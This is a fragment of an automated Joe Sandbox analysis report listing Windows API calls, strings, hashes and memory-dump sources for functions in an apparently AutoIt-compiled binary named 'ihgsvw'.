                • Opcode Fuzzy Hash: ac298fb0c7c9f09e0562fc83a3282b1b670ead2c45842b53f4a28bbaa6dc87ff
                • Instruction Fuzzy Hash: 7F01A8B5250308BFE610ABB5EC8DF6F7BACEB89721F004411FA05DB1A1CA709810DA20
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C34284
                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C34299
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C342B3
                • _wcslen.LIBCMT ref: 00C342F8
                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C34325
                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C34353
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$Window_wcslen
                • String ID: SysListView32
                • API String ID: 2147712094-78025650
                • Opcode ID: 876738edf417af93995c2c9da69b35217b1b78f2868848796832b78b2b6a86bc
                • Instruction ID: 0d3f8cbae5372c8f569e07e494d32af71155db19d9147313160937d01e3bf35f
                • Opcode Fuzzy Hash: 876738edf417af93995c2c9da69b35217b1b78f2868848796832b78b2b6a86bc
                • Instruction Fuzzy Hash: B841AF71910318ABEB259F64CC49FEE7BA9EF08350F10052AF964E7291D771AA94CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetMenuItemInfoW.USER32 ref: 00C0C5D9
                • IsMenu.USER32 ref: 00C0C5F9
                • CreatePopupMenu.USER32(00C72990,00000000,76F033D0), ref: 00C0C62F
                • GetMenuItemCount.USER32 ref: 00C0C680
                • InsertMenuItemW.USER32(016CA3F8,?,00000001,00000030), ref: 00C0C6A8
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Menu$Item$CountCreateInfoInsertPopup
                • String ID: 0$2
                • API String ID: 93392585-3793063076
                • Opcode ID: 8a24867ee283dbcf5ace5997edb52ed806ce5518c81a31b42cac9a068c896889
                • Instruction ID: e37015fc1c6204b533e82b4166e34fffec3187b3756e7a45f29c41cb9b38f045
                • Opcode Fuzzy Hash: 8a24867ee283dbcf5ace5997edb52ed806ce5518c81a31b42cac9a068c896889
                • Instruction Fuzzy Hash: 7E518E70A00305ABDF20CF68D9C8BAEBBF9AF45314F145359F821972E1E7729A44CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: IconLoad
                • String ID: blank$info$question$stop$warning
                • API String ID: 2457776203-404129466
                • Opcode ID: c9450c6dee7ff8c4c115505b19bd219a6c137510019c4ebcd1653f36a0a4d042
                • Instruction ID: efd76f762221af0e6e0e59f07e032d4dff7644692d56aeebcc130d3e87f159f7
                • Opcode Fuzzy Hash: c9450c6dee7ff8c4c115505b19bd219a6c137510019c4ebcd1653f36a0a4d042
                • Instruction Fuzzy Hash: 1C110D3124C307BAEB216B959C82DDE77DC9F15728F60407EF90AA62C1DBB19F418165
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                • String ID: 0.0.0.0
                • API String ID: 642191829-3771769585
                • Opcode ID: 3644a6003e6259809d74e3514dfef87d7b6e6930e6aa8a04f66117ebf0989c17
                • Instruction ID: 547aa64da479868bc95b9cbc73434c75c983589a04e6e56b8034cf607350eaac
                • Opcode Fuzzy Hash: 3644a6003e6259809d74e3514dfef87d7b6e6930e6aa8a04f66117ebf0989c17
                • Instruction Fuzzy Hash: 3311E131900215ABDB247B34AC4AFEE77ACDF01720F1405B9F556A20E2EF709A81DA61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(?), ref: 00C242C8
                • CharUpperBuffW.USER32(?,?), ref: 00C243D7
                • _wcslen.LIBCMT ref: 00C243E7
                • VariantClear.OLEAUT32(?), ref: 00C2457C
                  • Part of subcall function 00C115B3: VariantInit.OLEAUT32(00000000), ref: 00C115F3
                  • Part of subcall function 00C115B3: VariantCopy.OLEAUT32(?,?), ref: 00C115FC
                  • Part of subcall function 00C115B3: VariantClear.OLEAUT32(?), ref: 00C11608
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                • API String ID: 4137639002-1221869570
                • Opcode ID: 79c0b972ff0b52e8c015d1faa7835532761f8f8bf2c3e68477b22d09c24cd5af
                • Instruction ID: 93ec9dab1ff25a2d2dca4dd99d62905e6c66be8398cd9654bf1737611bb8385e
                • Opcode Fuzzy Hash: 79c0b972ff0b52e8c015d1faa7835532761f8f8bf2c3e68477b22d09c24cd5af
                • Instruction Fuzzy Hash: D7916874A083119FC704EF28D48196AB7E5FF89314F14896DF89A9B351DB30EE46CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsWindow.USER32(00000000), ref: 00C38896
                • IsWindowEnabled.USER32(00000000), ref: 00C388A2
                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00C3897D
                • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00C389B0
                • IsDlgButtonChecked.USER32(?,00000000), ref: 00C389E8
                • GetWindowLongW.USER32(00000000,000000EC), ref: 00C38A0A
                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C38A22
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                • String ID:
                • API String ID: 4072528602-0
                • Opcode ID: 850c5cc450edf683064ae8821d21e376f954af56553085514ddd5b4f5f1ce7f7
                • Instruction ID: ce933c3ddcaffa184c587c8e0be65880dca2814d20faf6f912242d0260a4d7f0
                • Opcode Fuzzy Hash: 850c5cc450edf683064ae8821d21e376f954af56553085514ddd5b4f5f1ce7f7
                • Instruction Fuzzy Hash: 6C71DF34624304AFEF219F65C884FBE7BB9EF0A300F544459F966932A1CB31AE48DB11
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00BC30DB
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00BC30E3
                • _ValidateLocalCookies.LIBCMT ref: 00BC3171
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC319C
                • _ValidateLocalCookies.LIBCMT ref: 00BC31F1
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: b1edaa0bb12593b484ba453603d6bab3acd4861da3650dad0d6a3f8bc87ef7cc
                • Instruction ID: 0e4d89fdb0db20bad363834148dcea6a05e88565e76c7e6e4405086331a23382
                • Opcode Fuzzy Hash: b1edaa0bb12593b484ba453603d6bab3acd4861da3650dad0d6a3f8bc87ef7cc
                • Instruction Fuzzy Hash: 6B41A134E00208AFCB10DF68C885F9EBBF5EF45B64F58C199E815AB292D7319B45CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C080D1
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C080F7
                • SysAllocString.OLEAUT32(00000000), ref: 00C080FA
                • SysAllocString.OLEAUT32 ref: 00C0811B
                • SysFreeString.OLEAUT32 ref: 00C08124
                • StringFromGUID2.OLE32(?,?,00000028), ref: 00C0813E
                • SysAllocString.OLEAUT32(?), ref: 00C0814C
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                • String ID:
                • API String ID: 3761583154-0
                • Opcode ID: f43cbbf0c34a80d2617131868a29a0327cde90451df0b5cc73bdfe57328c2be0
                • Instruction ID: 1df2a88c4f9e1ee1c28e104b33f1670760d3327b970fa4e0ab11036d596066c0
                • Opcode Fuzzy Hash: f43cbbf0c34a80d2617131868a29a0327cde90451df0b5cc73bdfe57328c2be0
                • Instruction Fuzzy Hash: 5F218671210204AFDB10AFA8DC88EAE77ECEF49360704C125F955CB2E0DA70ED89CB64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C0E23D
                • LoadStringW.USER32(00000000), ref: 00C0E244
                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C0E25A
                • LoadStringW.USER32(00000000), ref: 00C0E261
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C0E2A5
                Strings
                • %s (%d) : ==> %s: %s %s, xrefs: 00C0E282
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: HandleLoadModuleString$Message
                • String ID: %s (%d) : ==> %s: %s %s
                • API String ID: 4072794657-3128320259
                • Opcode ID: 9874d65f8890c134b6e569d889d959e6c84e85a919fcb281f0cdbf3a9d5da9a3
                • Instruction ID: a28c58b7053536dc1158b5202cc462519efc2f94e355948e7cd61847c4f34255
                • Opcode Fuzzy Hash: 9874d65f8890c134b6e569d889d959e6c84e85a919fcb281f0cdbf3a9d5da9a3
                • Instruction Fuzzy Hash: 3D0112F69102187FE7119794AD89FEA776CD708300F014991B756E2051EA749E848B71
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedExchange.KERNEL32(?,?), ref: 00C11237
                • EnterCriticalSection.KERNEL32(00000000,?), ref: 00C11249
                • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C11257
                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C11265
                • CloseHandle.KERNEL32(00000000), ref: 00C11274
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C11284
                • LeaveCriticalSection.KERNEL32(00000000), ref: 00C1128B
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                • String ID:
                • API String ID: 3495660284-0
                • Opcode ID: 51d653f946a48cb83b55126cb943f553f894c8b807f7d35407a552bc678fe214
                • Instruction ID: 617ce9b0c09a26521cea648904eca80e737105d424ca7e7addcd09d0a2ef40a7
                • Opcode Fuzzy Hash: 51d653f946a48cb83b55126cb943f553f894c8b807f7d35407a552bc678fe214
                • Instruction Fuzzy Hash: A7F03732056A12BBD7511B64FE8CBDABB39FF01302F442025F202918A0CB76E9B5DF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C2271D
                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C2273E
                • WSAGetLastError.WSOCK32 ref: 00C2274F
                • htons.WSOCK32(?,?,?,?,?), ref: 00C22838
                • inet_ntoa.WSOCK32(?), ref: 00C227E9
                  • Part of subcall function 00C04277: _strlen.LIBCMT ref: 00C04281
                  • Part of subcall function 00C23B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C1F569), ref: 00C23B9D
                • _strlen.LIBCMT ref: 00C22892
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                • String ID:
                • API String ID: 3203458085-0
                • Opcode ID: 9ed0b381da736c6954ab965649f0db3d27f3fda358589b0e541b97e58c894853
                • Instruction ID: d5332ce7cdc6b4b2ae3248923cebe45a118e9b11f5c1c8a3aa0ad245f356eac2
                • Opcode Fuzzy Hash: 9ed0b381da736c6954ab965649f0db3d27f3fda358589b0e541b97e58c894853
                • Instruction Fuzzy Hash: FAB1E071204310AFD324DF24D895F2A7BE5AF85318F54858CF4A64B2E2DB31EE45CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __allrem.LIBCMT ref: 00BD044A
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD0466
                • __allrem.LIBCMT ref: 00BD047D
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD049B
                • __allrem.LIBCMT ref: 00BD04B2
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD04D0
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                • String ID:
                • API String ID: 1992179935-0
                • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                • Instruction ID: e0c61c3e4831d8330e0a9d3c88865a532e99262e1c3bde42683cd0c9c97f7497
                • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                • Instruction Fuzzy Hash: 4E81A172A10B069BD724AE69D882B6AF7F9EF54324F2441ABE611D7381F7B0D9008B54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BC8669,00BC8669,?,?,?,00BD67DF,00000001,00000001,8BE85006), ref: 00BD65E8
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BD67DF,00000001,00000001,8BE85006,?,?,?), ref: 00BD666E
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD6768
                • __freea.LIBCMT ref: 00BD6775
                  • Part of subcall function 00BD3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC6A99,?,0000015D,?,?,?,?,00BC85D0,000000FF,00000000,?,?), ref: 00BD3BE2
                • __freea.LIBCMT ref: 00BD677E
                • __freea.LIBCMT ref: 00BD67A3
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 617cd6676ace44825e9fa019d643374e0203793bbaa99a5b2bd85b397435ec92
                • Instruction ID: c7e91bf13fc6b7ab0f308fedcd538faf40616d177dade8a6fd12b7486a7d3165
                • Opcode Fuzzy Hash: 617cd6676ace44825e9fa019d643374e0203793bbaa99a5b2bd85b397435ec92
                • Instruction Fuzzy Hash: EA51D17260021AABDB298F64CC81FAFB7EAEB44B54F1446AAFC15D6240FB34DC44C690
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C2D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2C00D,?,?), ref: 00C2D314
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D350
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3C7
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3FD
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C629
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2C684
                • RegCloseKey.ADVAPI32(00000000), ref: 00C2C6C9
                • RegEnumValueW.ADVAPI32 ref: 00C2C6F8
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C2C752
                • RegCloseKey.ADVAPI32(?), ref: 00C2C75E
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                • String ID:
                • API String ID: 1120388591-0
                • Opcode ID: 810b4f61d741357248d51808394ddb5a688496b4e5b21b39c27fb9d2b0be9b2b
                • Instruction ID: 7b86240d7a9c7e39c66a5c944d73ef54d521b4698908dc757fa52c4c162dbf22
                • Opcode Fuzzy Hash: 810b4f61d741357248d51808394ddb5a688496b4e5b21b39c27fb9d2b0be9b2b
                • Instruction Fuzzy Hash: 91819D70208241AFD714DF24D885E2ABBE5FF85708F14859CF45A8B2A2DB31ED45CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(00000035), ref: 00C00049
                • SysAllocString.OLEAUT32(00000000), ref: 00C000F0
                • VariantCopy.OLEAUT32(00C002F4,00000000), ref: 00C00119
                • VariantClear.OLEAUT32(00C002F4), ref: 00C0013D
                • VariantCopy.OLEAUT32(00C002F4,00000000), ref: 00C00141
                • VariantClear.OLEAUT32(?), ref: 00C0014B
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
